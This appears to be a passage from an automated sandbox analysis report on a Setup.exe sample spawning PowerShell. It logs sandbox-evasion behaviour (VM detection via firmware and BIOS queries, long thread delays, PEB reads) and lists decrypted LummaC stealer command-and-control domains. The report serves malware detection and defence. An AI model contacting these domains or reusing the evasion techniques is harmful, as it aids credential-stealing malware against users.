Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior

Malware Analysis System Evasion

Query firmware table information (likely to detect VMs)

Source: C:\Users\user\Desktop\Setup.exe

System information queried: FirmwareTableInformation

Jump to behavior

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

Thread delayed: delay time: 922337203685477

Jump to behavior

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 6899			Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 2769			Jump to behavior

Source: C:\Users\user\Desktop\Setup.exe TID: 6360	Thread sleep time: -30000s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 3688	Thread sleep count: 6899 > 30	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 4476	Thread sleep count: 2769 > 30	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 4500	Thread sleep time: -6456360425798339s >= -30000s	Jump to behavior

Source: C:\Users\user\Desktop\Setup.exe

WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM Win32_BIOS

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

Thread delayed: delay time: 922337203685477

Jump to behavior

Source: Setup.exe, 00000000.00000003.2629810484.0000000000E1E000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAWSl,
Source: powershell.exe, 00000004.00000002.2033691829.0000000005426000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Remove-NetEventVmNetworkAdapter
Source: Setup.exe, 00000000.00000002.4128976476.0000000000DE1000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW0n
Source: powershell.exe, 00000004.00000002.2033691829.0000000005426000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Add-NetEventVmNetworkAdapter
Source: Setup.exe, 00000000.00000003.2629810484.0000000000E1E000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW
Source: powershell.exe, 00000004.00000002.2033691829.0000000005426000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Get-NetEventVmNetworkAdapter

Source: C:\Users\user\Desktop\Setup.exe

Process information queried: ProcessInformation

Jump to behavior

Source: C:\Users\user\Desktop\Setup.exe

Code function: 0_2_0320A0F0 LdrInitializeThunk,

0_2_0320A0F0

Source: C:\Users\user\Desktop\Setup.exe	Code function: 0_2_00F803AF mov edx, dword ptr fs:[00000030h]	0_2_00F803AF
Source: C:\Users\user\Desktop\Setup.exe	Code function: 0_2_00F8096F mov eax, dword ptr fs:[00000030h]	0_2_00F8096F
Source: C:\Users\user\Desktop\Setup.exe	Code function: 0_2_00F80D1F mov eax, dword ptr fs:[00000030h]	0_2_00F80D1F
Source: C:\Users\user\Desktop\Setup.exe	Code function: 0_2_00F80FBE mov eax, dword ptr fs:[00000030h]	0_2_00F80FBE
Source: C:\Users\user\Desktop\Setup.exe	Code function: 0_2_00F80FBF mov eax, dword ptr fs:[00000030h]	0_2_00F80FBF

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

Process token adjusted: Debug

Jump to behavior

HIPS / PFW / Operating System Protection Evasion

LummaC encrypted strings found

Source: Setup.exe	String found in binary or memory: bashfulacid.lat
Source: Setup.exe	String found in binary or memory: curverpluch.lat
Source: Setup.exe	String found in binary or memory: tentabatte.lat
Source: Setup.exe	String found in binary or memory: talkynicer.lat
Source: Setup.exe	String found in binary or memory: manyrestro.lat
Source: Setup.exe	String found in binary or memory: shapestickyr.lat
Source: Setup.exe	String found in binary or memory: wordyfindy.lat
Source: Setup.exe	String found in binary or memory: slipperyloo.lat
Source: Setup.exe	String found in binary or memory: moanungsnake.click

Source: Setup.exe

Binary or memory string: progman

Source: C:\Users\user\Desktop\Setup.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.Management.Infrastructure.Native\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.Native.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0013~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0314~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.KeyDistributionService.Cmdlets\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.KeyDistributionService.Cmdlets.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.KeyDistributionService.Cmdlets\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.KeyDistributionService.Cmdlets.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.KeyDistributionService.Cmdlets\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.KeyDistributionService.Cmdlets.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
